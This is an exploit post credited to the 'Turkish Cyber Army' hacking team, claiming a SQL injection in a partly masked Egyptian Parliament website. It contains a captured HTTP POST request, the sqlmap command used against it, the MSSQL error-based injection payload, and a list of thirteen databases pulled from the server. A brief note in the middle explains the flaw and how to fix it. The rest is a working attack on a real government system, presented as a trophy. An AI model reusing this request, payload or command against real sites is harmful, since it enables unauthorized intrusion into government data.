# Exploit Title : Egyptian Parliament Blind SQL Injection
# Team : Sanal Türk Ordusu "Turkish Cyber Army"
# Date : 20/03/2020
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/
# My Youtube Channel : youtube.com/channel/UCjUVMvbk5JGNjrM9rMan81Q/
POST /qualitativecommitteesdetails.aspx?id=349*1*1*1*1*1*1* HTTP/1.1
Content-Length: 8326
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.parl*****nt.gov.eg/
Cookie: ASP.NET_SessionId=h3awgiyku1ct4rbvzcnw1wgu
Host: www.parl*****nt.gov.eg
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Button1=%d8%b9&__EVENTVALIDATION=/wEdAASM0mJ8UD5ls0716QnTIfWRn1RcjtHAj66REed34CUNnqUF4enLXO3emfMk8iBi1qtAqph6VcNpTzh580pS1lO75uIgdLmY6/Eaf/b3Tj4B/xYlSWk09YXiVlPdA1KcoLw=&__VIEWSTATE=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%2bT1rjC1m4VQf3rqR2XNwHgL60&__VIEWSTATEGENERATOR=3B767541
sqlmap -r 1.txt --dbs --batch
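# Note : The title says blind, but the sqlmap result below classifies the flaw as error-based: the `id` value in the URI is interpreted as SQL by a Microsoft SQL Server back end, and database error text is returned in the response. The fix is to bind `id` as a typed (integer) parameter and to return generic error pages instead of database error details.
Parameter: #1* (URI)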
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: http://www.parl*****nt.gov.eg:80/qualitativecommitteesdetails.aspx?id=-3506 OR 2208 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2208=2208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113)))-- CiNo111111
available databases [13]:
[*] E-MINUTES_OPR
[*] master
[*] MEM_OPR
[*] MEMBERS_OPERATOR
[*] MEMDA_OPR
[*] model
[*] msdb
[*] PARLDB
[*] ReportServer$SQL_2008
[*] ReportServer$SQL_2008TempDB
[*] SGOES_OPR
[*] SPEAKER_AGENDA
[*] tempdb